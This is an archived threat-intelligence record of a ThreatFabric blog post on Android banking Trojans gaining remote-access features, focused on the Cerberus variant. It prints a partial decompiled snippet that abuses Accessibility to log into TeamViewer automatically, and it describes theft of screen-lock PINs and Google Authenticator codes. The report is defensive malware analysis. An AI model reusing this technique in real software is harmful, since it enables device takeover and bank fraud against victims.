{
	"id": "da27d497-9d19-443b-b86e-433199332fe2",
	"created_at": "2026-04-06T01:32:30.733127Z",
	"updated_at": "2026-04-10T03:30:32.832387Z",
	"deleted_at": null,
	"sha1_hash": "da0dee4f29a466f1dbdb916c85a05f326649b88a",
	"title": "2020 - Year of the RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 51463,
	"plain_text": "2020 - Year of the RAT\r\nPublished: 2024-10-01 · Archived: 2026-04-06 00:52:38 UTC\r\nIntro\r\nAccording to the Chinese zodiac 2020 is the year of the RAT, and in accordance with the myth the rat tricked his\r\nadversary in order to be ahead of him and “win the race”. The RAT mindset is also a growing trend that\r\nThreatFabric analysts have observed in mobile banking Trojans over the last years. This blog provides an\r\noverview of the changes that took place in the last months on the mobile banking threat landscape and describes\r\nwhy we can expect an increase in the use of Remote Access Trojans for fraudulent purposes.\r\nPlay on words aside, in the world of malware the term RAT stands for Remote Access Trojan. This functionality\r\ncan be added to malware in order to provide the criminal operator the same degree of (remote) control of the\r\ninfected device as its owner/user has.\r\nRemote access can be achieved in different ways, for example by using more-or-less native services such as SSH\r\n(Secure Shell) or RDP (Remote Desktop Protocol), or even by using third-party software such as TeamViewer,\r\nVNC or RAdmin. We want to stress that those tools by themselves are not inherently malicious and are in most\r\ncases used for legitimate purposes, such as providing users with support or perform remote administration (hence\r\ncalling this type of utilities Remote Administration Tools which can cause confusion). Some malicious actors\r\nprefer to develop their own code/tools with the hope to remain under the radar while benefiting of similar\r\nfunctionality.\r\nHistorically, mobile banking malware was designed and used primarily to access and steal information that\r\nfacilitates financial fraud. Examples of such information include second factors of authentication (SMS, mTAN)\r\nand other secrets that could be used to perform fraud through the targeted banking services. As fraud detection\r\nmechanisms used by financial institutions evolved it became harder for criminals to use aforementioned methods\r\nwithout being detected.\r\nThreat actors have conceived diverse ways to circumvent detection mechanisms by impersonating the victim’s\r\ndevice. A famous one is the use of a back-connect proxy on the infected device combined with device fingerprints,\r\nallowing the actor’s device to look like the “real” one. Solutions like device binding and fingerprinting allowed\r\nfinancials to detect such techniques, therefore criminals had to innovate again. In this situation RATs are\r\ncriminals’ Holy Grail, as they offer the ability to perform fraudulent transactions directly from the infected\r\n(victim) device. By doing so, criminals are making it substantially harder to detect fraudulent transactions without\r\na client-based detection solution.\r\nIn Android banking malware, the RAT capability has not been commonly used due to limitations of the Android\r\noperating system (it requires use of the Accessibility Service). Nevertheless, back in 2016 the “Retefe” threat\r\nactors were already observed making use of RAT functionality by abusing the TeamViewer application, giving\r\nthem full control over the infected device. As Retefe is run by a group of experienced Windows malware actors\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nPage 1 of 4\n\nand because RAT capabilities are quite common in Windows banking malware, the actors probably decided to\r\nreuse that approach with Android devices as well.\r\nThreat actors motivated by financial gain have noticed the shift of consumers from desktop towards mobile based\r\nonline banking. This trend has also resulted in the evolution of mobile malware in order to bypass detection\r\nmeasures. From simple SMS-stealer to fully-fledged RAT with Automated Transaction Systems, criminals\r\ncontinuously innovate to try to remain successful. Hereafter is an overview of recent changes made by some key\r\nplayers in the Android banking malware threat landscape.\r\nCerberus\r\nThe Cerberus banking Trojan that appeared on the threat landscape end of June 2019 has taken over from the\r\ninfamous Anubis Trojan as major rented banking malware. While offering a feature-set that enables successful\r\nexfiltration of personally identifiable information (PII) from infected devices, Cerberus was still lacking features\r\nthat could help lowering the detection barrier during the abuse of stolen information and fraud. Mid-January 2020,\r\nafter new-year celebrations, Cerberus authors came back with a new variant that aimed to resolve that problem, a\r\nRAT feature to perform fraud from the infected device.\r\nThis new Cerberus variant has undergone refactoring of the code base and updates of the C2 communication\r\nprotocol, but most notably it got enhanced with the RAT capability, possibility to steal device screen-lock\r\ncredentials (PIN code or swipe pattern) and 2FA tokens from the Google Authenticator application.\r\nThe RAT service is able to traverse the file system of the device and download its contents. On top of that it can\r\nalso launch TeamViewer and setup connections to it, providing threat actors full remote access of the device.\r\nOnce TeamViewer is working, it provides actors with many possibilities, including changing device settings,\r\ninstalling or removing apps, but most notably using any app on the device (such as banking apps, messengers and\r\nsocial network apps). It can also provide valuable insight into victim’s behavior and habits; in case it would be\r\nused for espionage purposes.\r\nThe following snippet shows the code responsible for TeamViewer login and initialization:\r\nString runningPackage = this.lowerPkgName;\r\nif (getNodeFromEvent.contains(\"com.teamviewer.host.market\")) {\r\n AccessibilityNodeInfo username = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/h\r\n AccessibilityNodeInfo password = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/h\r\n AccessibilityNodeInfo submit = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/hos\r\n if (username != null) {\r\n this.teamviewerUsername = this.utils.readShPrStr(this, this.strings.connect_teamviewer);\r\n if (!this.teamviewerUsername.isEmpty()) {\r\n this.teamviewerPassord = this.utils.readShPrStr(this, this.strings.password);\r\n this.credsSubmitted = false;\r\n this.passwordFilled = false;\r\n this.userFilled = false;\r\n this.permissionStatus = 0;\r\n this.utils.writeShPrStr(this, this.strings.connect_teamviewer, \"\");\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nPage 2 of 4\n\nthis.utils.writeShPrStr(this, this.strings.password, \"\");\r\n }\r\n }\r\n if (this.permissionStatus == 0) {\r\n AccessibilityNodeInfo v7\\ _7 = AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id\r\n if (v7_7 != null \u0026\u0026 AcccesibilityUtils.getNodeFromEvent(event, \"com.teamviewer.host.market:id/buttonPane\r\n this.permissionStatus = 1;\r\n AccessibilityNodeInfo tmButton = AcccesibilityUtils.getNodeFromEvent(event, \"android:id/button1\");\r\n if (tmButton != null) {\r\n this.acc_utils.clickButton(tmButton);\r\n }\r\n AccessibilityNodeInfo klmCheckBox = AcccesibilityUtils.getNodeFromEvent(event, \"com.samsung.klmsagen\r\n AccessibilityNodeInfo klmConfirm = AcccesibilityUtils.getNodeFromEvent(event, \"com.samsung.klmsagent\r\n if (klmCheckBox != null \u0026\u0026 this.permissionStatus == 1) {\r\n this.acc_utils.clickButton(klmCheckBox);\r\n this.acc_utils.clickButton(klmConfirm);\r\n this.permissionStatus = 2;\r\n Utils utils = this.utils;\r\n utils.launchPkg(this, \"com.teamviewer.host.market\");\r\n }\r\n }\r\n }\r\n if (!this.teamviewerUsername.isEmpty() \u0026\u0026 !this.teamviewerPassord.isEmpty()) {\r\n if (username != null \u0026\u0026 !this.userFilled) {\r\n this.acc_utils.setInput(username, this.teamviewerUsername);\r\n this.userFilled = true;\r\n }\r\n if (password != null \u0026\u0026 !this.passwordFilled) {\r\n this.acc_utils.setInput(password, this.teamviewerPassord);\r\n this.passwordFilled = true;\r\n }\r\n if ((this.userFilled) \u0026\u0026 (this.passwordFilled) \u0026\u0026 !this.credsSubmitted) {\r\n this.permissionStatus = 0;\r\n this.acc_utils.clickButton(submit);\r\n this.credsSubmitted = true;\r\n String v0_9 = this.utils.readShPrStr(this, this.strings.hidden);\r\n if (v0_9.equals(\"true\")) {\r\n this.goBack();\r\n }\r\n }\r\n }\r\n}\r\nThe feature enabling theft of device’s screen lock credentials (PIN and lock pattern) is powered by a simple\r\noverlay that will require the victim to unlock the device. From the implementation of the RAT we can conclude\r\nthat this screen-lock credential theft was built in order for the actors to be able to remotely unlock the device in\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nPage 3 of 4\n\norder to perform fraud when the victim is not using the device. This once more shows the creativity of criminals to\r\nbuild the right tools to be successful.\r\nAbusing the Accessibility privileges, the Trojan can now also steal 2FA codes from Google Authenticator\r\napplication. When the app is running, the Trojan can get the content of the interface and can send it to the C2\r\nserver. Once again, we can deduce that this functionality will be used to bypass authentication services that rely on\r\nOTP codes.\r\nThis is an example of what the Google Authenticator application looks like:\r\nSource: https://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nhttps://www.threatfabric.com/blogs/2020_year_of_the_rat.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/2020_year_of_the_rat.html"
	],
	"report_names": [
		"2020_year_of_the_rat.html"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775439150,
	"ts_updated_at": 1775791832,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.pdf",
		"text": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.txt",
		"img": "https://archive.orkl.eu/da0dee4f29a466f1dbdb916c85a05f326649b88a.jpg"
	}
}